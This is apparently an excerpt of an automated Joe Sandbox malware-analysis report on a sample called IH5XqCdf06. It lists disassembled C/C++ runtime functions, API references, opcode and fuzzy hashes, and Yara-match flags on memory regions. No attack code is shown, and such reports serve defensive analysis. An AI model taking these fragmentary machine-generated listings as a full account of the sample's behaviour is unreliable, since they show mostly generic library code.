                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                    • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                    • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                    • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                    • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                    • Instruction ID: 60a10158cf7180d293c789ba7d71481684456bd3757765d45f2463cc4597e82b
                                                                                                    • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                    • Instruction Fuzzy Hash: 47C1F574D04359AFDF15DFA8C841BEEBBB2AF0A310F148199E418A7392D7309A41DB65
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: fB$csm
                                                                                                    • API String ID: 1170836740-1586063737
                                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                    APIs
                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                    • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                    • API String ID: 1467055271-2956939130
                                                                                                    • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                    • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                    • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                    • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                    • int.LIBCPMT ref: 00405596
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID: @bn
                                                                                                    • API String ID: 2243866535-1914311080
                                                                                                    • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                    • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                    • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                    • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                    APIs
                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 0065C6DC
                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 0065C700
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0065C711
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0065C71F
                                                                                                      • Part of subcall function 00641370: __Mtx_unlock.LIBCPMT ref: 00641377
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0065C72F
                                                                                                      • Part of subcall function 0065C3EF: __Cnd_broadcast.LIBCPMT ref: 0065C3F6
                                                                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0065C73D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                    • String ID: t#D
                                                                                                    • API String ID: 4258476935-1671555958
                                                                                                    • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                    • Instruction ID: 92045170cdace6307d88eaa839883fa997be0f4fa6ba843dcadc4c00e937fb2c
                                                                                                    • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                    • Instruction Fuzzy Hash: 60012B71900605ABDB51BBB0CD86B9DB35BBF04311F144119FD0097681DFB4EF19879A
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                    • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                    • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                    • __freea.LIBCMT ref: 0043231B
                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    • __freea.LIBCMT ref: 00432324
                                                                                                    • __freea.LIBCMT ref: 00432349
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3864826663-0
                                                                                                    • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                    • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                    • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                    • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                    • _free.LIBCMT ref: 00671444
                                                                                                    • _free.LIBCMT ref: 0067145D
                                                                                                    • _free.LIBCMT ref: 0067148F
                                                                                                    • _free.LIBCMT ref: 00671498
                                                                                                    • _free.LIBCMT ref: 006714A4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast
                                                                                                    • String ID: C
                                                                                                    • API String ID: 3291180501-1037565863
                                                                                                    • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                    • Instruction ID: 2d54e87321699d640f0c4ccbf5f5190ab6559aab3af13c9b5593a2220073daca
                                                                                                    • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                    • Instruction Fuzzy Hash: 19B14A75A01219DFDB64DF18C884AADB7B6FB09314F6085AEE90DAB351D730AE90CF44
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                    • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                    • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                    • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                    • Instruction ID: 5b040c4f47bbfe0143bdba0a4886087f4bb5e55622c143a3245954d0ae2c389e
                                                                                                    • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                    • Instruction Fuzzy Hash: F761F471904205AFDB60CFA4C842B9EBBF6EF84310F24816AF958EB342E7719E41DB55
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                    • __fassign.LIBCMT ref: 00433940
                                                                                                    • __fassign.LIBCMT ref: 0043395B
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                    • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                    • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                    • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                    • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(?,0066C4A4,E0830C40,?,?,?,?,?,?,0067425F,0064E03C,0066C4A4,?,0066C4A4,0066C4A4,0064E03C), ref: 00673B2C
                                                                                                    • __fassign.LIBCMT ref: 00673BA7
                                                                                                    • __fassign.LIBCMT ref: 00673BC2
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0066C4A4,00000001,?,00000005,00000000,00000000), ref: 00673BE8
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,0067425F,00000000,?,?,?,?,?,?,?,?,?,0067425F,0064E03C), ref: 00673C07
                                                                                                    • WriteFile.KERNEL32(?,0064E03C,00000001,0067425F,00000000,?,?,?,?,?,?,?,?,?,0067425F,0064E03C), ref: 00673C40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                    • Instruction ID: e1eecdd3d1ea9d6d92f9bc6ed16abf72f0d94b46fa514290983de3437d5d8cfa
                                                                                                    • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                    • Instruction Fuzzy Hash: 9251B475900219AFCB11CFA8D885AEEBBF5EF09700F14816EE55AF7391E7309A41CB64
                                                                                                    APIs
                                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00664ACD
                                                                                                      • Part of subcall function 00664D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00664800), ref: 00664DAC
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00664AE2
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00664AF1
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00664AFF
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00664B75
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00664BB5
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00664BC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3151764488-0
                                                                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction ID: 2edb50b9f1ca7ef39ec0821d81f7f632a181c2987687814781303b852e75d6c0
                                                                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction Fuzzy Hash: EA31A335A00215ABCB04EFA8C881AAE73B7FF55310F204569ED159B346DF70EE05C794
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                    • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                    • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                    • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                    • Instruction ID: 7fde2751b549bdfd686a5de7faff7807b8ed13822ccd9ef230153db4444e0a71
                                                                                                    • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                    • Instruction Fuzzy Hash: D1112935514119BFDB212F768C08D6B7A5EEFC2B60B208639FC1DD7240EA318901D6B4
                                                                                                    APIs
                                                                                                      • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                    • _free.LIBCMT ref: 0043A3D1
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 0043A3DC
                                                                                                    • _free.LIBCMT ref: 0043A3E7
                                                                                                    • _free.LIBCMT ref: 0043A43B
                                                                                                    • _free.LIBCMT ref: 0043A446
                                                                                                    • _free.LIBCMT ref: 0043A451
                                                                                                    • _free.LIBCMT ref: 0043A45C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067A331: _free.LIBCMT ref: 0067A35A
                                                                                                    • _free.LIBCMT ref: 0067A638
                                                                                                      • Part of subcall function 006736D1: HeapFree.KERNEL32(00000000,00000000,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?), ref: 006736E7
                                                                                                      • Part of subcall function 006736D1: GetLastError.KERNEL32(?,?,0067A35F,?,00000000,?,00000000,?,0067A603,?,00000007,?,?,0067A9F7,?,?), ref: 006736F9
                                                                                                    • _free.LIBCMT ref: 0067A643
                                                                                                    • _free.LIBCMT ref: 0067A64E
                                                                                                    • _free.LIBCMT ref: 0067A6A2
                                                                                                    • _free.LIBCMT ref: 0067A6AD
                                                                                                    • _free.LIBCMT ref: 0067A6B8
                                                                                                    • _free.LIBCMT ref: 0067A6C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction ID: 1af861d220d1ac7c9185fc4e3b85d2dc088fc07b9175236368d8cf475a8512ce
                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction Fuzzy Hash: D211AC71604B04BADEA0BBB1CC47FCF779EEF40310F50882CB2DDEA252DA64B6109649
                                                                                                    APIs
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID:
                                                                                                    • API String ID: 4227777306-0
                                                                                                    • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                    • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                    • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                    • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                    APIs
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00650DA0,?,?,?,00000000), ref: 00652667
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00650DA0,?,?,?,00000000), ref: 0065266D
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00650DA0,?,?,?,00000000), ref: 0065269A
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00650DA0,?,?,?,00000000), ref: 006526A4
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00650DA0,?,?,?,00000000), ref: 006526B6
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006526CC
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006526DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID:
                                                                                                    • API String ID: 4227777306-0
                                                                                                    • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                    • Instruction ID: 8ec3967baa9acca20a9bd065aee2f02e8a2e670a5af2dce474c633024522860e
                                                                                                    • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                    • Instruction Fuzzy Hash: 6201D434600116ABDB20AF61EC59EAF376AAF43B53F600529F801E3161DB24D90886A8
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0065670B), ref: 006524B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 006524C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 006524D2
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0065670B), ref: 00652500
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00652507
                                                                                                    • GetLastError.KERNEL32(?,?,?,0065670B), ref: 00652522
                                                                                                    • GetLastError.KERNEL32(?,?,?,0065670B), ref: 0065252E
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00652544
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00652552
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID: kernel32.dll
                                                                                                    • API String ID: 4179531150-1793498882
                                                                                                    • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
